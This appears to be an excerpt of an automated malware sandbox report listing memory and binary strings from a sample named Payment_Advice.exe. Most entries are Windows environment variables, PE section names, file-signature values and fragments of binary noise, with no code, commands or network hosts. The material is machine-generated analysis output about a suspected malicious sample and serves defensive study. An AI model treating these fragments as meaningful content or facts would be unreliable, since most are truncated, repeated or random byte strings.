          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: driverdata=c:\windows\system32\drivers\driverdatamemstr_1bd28b7f-5
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fps_browser_app_profile_string=internet explorermemstr_355bdbe0-0
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fps_browser_usememstr_4ceffd56-5
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d.exedriverdata=c:\windows\system32\drivers\driverdatafps_browser_app_profile_string=internet explorerfps_browser_usememstr_86195f5b-7
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: users\usermemstr_06178ea4-d
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: localappdata=c:\users\user\appdata\localmemstr_a8322fa6-b
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: logonserver=\\user-pcmemstr_215a4fe2-e
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: number_omemstr_25a81478-8
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: users\userlocalappdata=c:\users\user\appdata\locallogonserver=\\user-pcnumber_omemstr_66b36611-d
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: srivememstr_337271f0-5
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: os=windows_ntmemstr_a0a04ef9-6
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: path=c:\program files (x86)\common files\oracle\java\javapath;c:\windows\memstr_9bc60010-1
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sriveos=windows_ntpath=c:\program files (x86)\common files\oracle\java\javapath;c:\windows\memstr_068ed602-c
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ows;c:\windows\system32\wbem;c:\windows\system32\windowspowershell\v1.0\;c:\windows\system32\openssh\;c:\users\user\apimemstr_653cc0e3-2
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ows;c:\windows\system32\wbem;c:\windows\system32\windowspowershell\v1.0\;c:\windows\system32\openssh\;c:\users\user\apiimemstr_262f2662-d
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: osoft\windowsapps;memstr_bb2ea146-f
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pathext=.com;.exe;.bat;.cmd;.vbs;.vbe;.js;.jse;.wsf;.wsh;.mscmemstr_a2c7717b-5
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processor_architecture=x86memstr_df38e53c-0
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processor_arxmemstr_8d48a780-0
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: osoft\windowsapps;pathext=.com;.exe;.bat;.cmd;.vbs;.vbe;.js;.jse;.wsf;.wsh;.mscprocessor_architecture=x86processor_arxxmemstr_9f32d5c0-4
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r=intel64 family 6 model 143 stepping 8, genuineintelmemstr_0dacf1cd-5
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processor_level=6memstr_b2280949-1
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processor_revision=8f08memstr_e310a83e-a
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: proggmemstr_1826c23f-d
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r=intel64 family 6 model 143 stepping 8, genuineintelprocessor_level=6processor_revision=8f08progggmemstr_09489e94-0
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: memstr_e3c3c5ac-f
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: memstr_a0028666-4
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: memstr_4734005e-6
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: memstr_47550c50-7
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: abcdefghijklmnopqrstuvwxyzmemstr_b4214955-0
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: abcdefghijklmnopqrstuvwxyzmemstr_64e9224f-d
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzmemstr_9c087f0a-3
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: allusersprofile=c:\programdatamemstr_560062bf-a
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appdata=c:\users\user\appdata\roamingmemstr_2995ad9c-f
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: commonprogramfiles=c:\program files (x86)\common filesmemstr_91a4306b-2
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: commonprogramfiles(x86)=c:\program files (x86)\common filesmemstr_f7d6669e-f
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: comspec=c:\windows\system32\cmd.exememstr_2dc3a5e5-b
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fps_browser_user_profile_string=defaultmemstr_44b7ffaf-3
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: homedrive=c:memstr_5f792f6f-3
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: homepath=\users\usermemstr_a255dd12-a
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: number_of_processors=2memstr_9107fcba-a
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: onedrive=c:\users\user\onedrivememstr_2a63d1bd-6
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: path=c:\program files (x86)\common files\oracle\java\javapath;c:\windows\system32;c:\windows;c:\windows\system32\wbem;c:\windows\system32\windowspowershell\v1.0\;c:\windows\system32\openssh\;c:\users\user\appdata\local\microsoft\windowsapps;memstr_f7aec71a-5
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processor_architew6432=amd64memstr_258840c6-a
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processor_identifier=intel64 family 6 model 143 stepping 8, genuineintelmemstr_64ce2a52-b
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: programdata=c:\programdatamemstr_e04efcda-6
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: programfiles=c:\program files (x86)memstr_f1051d9e-0
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: programfiles(x86)=c:\program files (x86)memstr_e8ecc641-0
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: programw6432=c:\program filesmemstr_ee145769-3
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: psmodulepath=c:\program files (x86)\windowspowershell\modules;c:\windows\system32\windowspowershell\v1.0\modules;c:\program files (x86)\autoit3\autoitxmemstr_cdf562ca-c
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: public=c:\users\publicmemstr_832b8d80-6
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sessionname=consolememstr_71c4bcfe-2
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: systemdrive=c:memstr_25f88ccc-a
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: systemroot=c:\windowsmemstr_4d491c05-1
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: temp=c:\users\user\appdata\local\tempmemstr_740debdf-d
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tmp=c:\users\user\appdata\local\tempmemstr_e6274697-3
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: userdomain=hubert-pcmemstr_bb64cff2-f
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: userdomain_roamingprofile=hubert-pcmemstr_8867b6c8-f
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: username=hubertmemstr_3b78dab4-c
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: userprofile=c:\users\usermemstr_c02f55d7-9
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: windir=c:\windowsmemstr_83c80023-a
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: allusersprofile=c:\programdataappdata=c:\users\user\appdata\roamingcommonprogramfiles=c:\program files (x86)\common filescommonprogramfiles(x86)=c:\program files (x86)\common filescommonprogramw6432=c:\program files\common filescomputername=user-pccomspec=c:\windows\system32\cmd.exedriverdata=c:\windows\system32\drivers\driverdatafps_browser_app_profile_string=internet explorerfps_browser_user_profile_string=defaulthomedrive=c:homepath=\users\userlocalappdata=c:\users\user\appdata\locallogonserver=\\user-pcnumber_of_processors=2onedrive=c:\users\user\onedriveos=windows_ntpath=c:\program files (x86)\common files\oracle\java\javapath;c:\windows\system32;c:\windows;c:\windows\system32\wbem;c:\windows\system32\windowspowershell\v1.0\;c:\windows\system32\openssh\;c:\users\user\appdata\local\microsoft\windowsapps;pathext=.com;.exe;.bat;.cmd;.vbs;.vbe;.js;.jse;.wsf;.wsh;.mscprocessor_architecture=x86processor_architew6432=amd64processor_identifier=intel64 family 6 model 143 stepping 8, genuineintelprocessor_level=6processor_revision=8f08programdata=c:\programdataprogramfiles=c:\program files (x86)programfiles(x86)=c:\program files (x86)programw6432=c:\program filespsmodulepath=c:\program files (x86)\windowspowershell\modules;c:\windows\system32\windowspowershell\v1.0\modules;c:\program files (x86)\autoit3\autoitxpublic=c:\users\publicsessionname=consolesystemdrive=c:systemroot=c:\windowstemp=c:\users\user\appdata\local\temptmp=c:\users\user\appdata\local\tempuserdomain=user-pcuserdomain_roamingprofile=user-pcusername=useruserprofile=c:\users\userwindir=c:\windowsmemstr_205291f6-6
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @fgu`fgumemstr_87033423-e
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ggu ggu@ggu`ggumemstr_7bd3fcd3-e
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fguggu ggu@ggu`ggumemstr_c9274666-0
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hgu hgu@hgu`hgumemstr_5c2f8896-d
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gguhgu hgu@hgu`hgumemstr_1ff3f349-1
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0y^mla]mmemstr_1a30c8b5-0
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p6dm!memstr_c8b925dd-e
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p6dm!!memstr_bc8772eb-3
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pem!memstr_61cc0805-0
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pem!!memstr_cd3c28a9-f
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mm!!lmemstr_6466fe60-8
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ncm!!memstr_0f1bdce5-b
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mmmaadmemstr_4268910e-7
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^mla]mmemstr_67a19bcb-5
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wz6@ememstr_91d51dd3-f
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :k@6memstr_f8b88071-9
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mm!!:memstr_571089ff-6
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @]m!%memstr_2cfe7384-2
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ftypmif1memstr_42c29ede-0
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ftypavcimemstr_ca490e00-e
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ftyphevcmemstr_49be6343-0
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ftypheismemstr_0bec5676-5
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ftypheixmemstr_9e262448-6
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ftypjpegmemstr_17cd4d4b-9
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ftypavifmemstr_92bc2983-4
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ftypavismemstr_5af28c46-0
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ftypmsf1memstr_a1b80e01-a
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <]m|<]mmemstr_8aa475aa-9
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ttabtip-mainui]mmemstr_b5cc0084-0
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: am *qmnmemstr_bb8cdbbd-f
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: am *qmnnmemstr_70db5dcf-f
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ! @~dmemstr_da1fe314-f
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ! memstr_c14242e0-e
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a@!!memstr_4a47675a-f
          Source: Payment_Advice.exe, 00000000.00000002.1550496590.00000000056F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ! "!#"$#%$&%'&(')(*)+*,+-,.-/.0/102132435465768798:9;:<;=<>=?>@?a@eaibmcqdueyf]gaheiijmkqlumyn}omemstr_e460025e-5
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !this program cannot be run in dos mode.memstr_86d15697-7
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rich<>memstr_78dffd16-8
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .textmemstr_9f317b23-b
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `.rdatamemstr_dcd811c2-d
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `.rdatamemstr_fb070ca9-f
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @.datamemstr_faf7a522-1
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @@.data gmemstr_af49dd0b-8
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .didatmemstr_2115ae41-7
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .rsrcmemstr_dd4c618c-8
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .rsrcxmemstr_5950170a-2
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @.relocmemstr_c39da386-3
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @@.reloc<#memstr_3b969ba8-8
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t1h!0memstr_a06db4c7-2
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t1h!0pmemstr_ff2b3d18-a
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ha&cpdmemstr_30fd53bf-1
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5ct wmemstr_c5c05263-7
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f2pj9memstr_95853fcc-7
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9ruj+memstr_dd2291ee-3
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c2pj<memstr_12330e25-6
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zqug3memstr_bf4ad494-9
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g2pj9memstr_949a811f-b
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tcsj\memstr_a6c410e7-9
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l$$uumemstr_bc14e916-7
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e@qqqqpmemstr_8a2899ca-8
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mtuu3memstr_68d48183-4
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !hp6cmemstr_a13010c3-f
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c2ppjmemstr_65478ae2-e
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c2ppu^hmemstr_97ad36c0-d
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t"t_jmemstr_72ea8e18-2
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hp6cwmemstr_57dbb506-8
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f2pj8memstr_51210065-8
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )\$pfmemstr_0308b06f-f
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )l$@fmemstr_9bcb8f59-c
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nl$ fmemstr_ce9a0cba-a
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nl$,fmemstr_ee097efe-e
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nt$(fmemstr_d0be5412-e
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nl$$fmemstr_18b27cbc-d
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n|$0fmemstr_4e3bbe7a-2
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nl$0fmemstr_e592ae58-5
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nd$$fmemstr_d26a217d-5
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nl$(fmemstr_f4139524-c
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nt$ fmemstr_70fe0c7b-5
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nt$4fmemstr_fdee2e2b-2
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nd$0fmemstr_cd09f9a6-1
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n|$$fmemstr_338a2994-9
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nd$ fmemstr_1c1bc53c-a
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nd$,fmemstr_cecbb29f-2
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n|$4fmemstr_c7dad7dd-d
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n|$ fmemstr_e1d2dde7-6
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nd$4fmemstr_75c1093e-f
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n|$,fmemstr_99f5e162-6
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nt$$fmemstr_d3740977-0
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nt$,fmemstr_ecebbb15-c
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nl$4fmemstr_bab716b0-c
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nd$(fmemstr_728fedc2-1
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vosuqmemstr_672ff307-9
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [j vwmemstr_3ee94f43-c
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^j@wumemstr_ad72d538-3
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \$ +|$ !t$memstr_cc5ace0f-a
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t$$9t$memstr_7e60b5a1-f
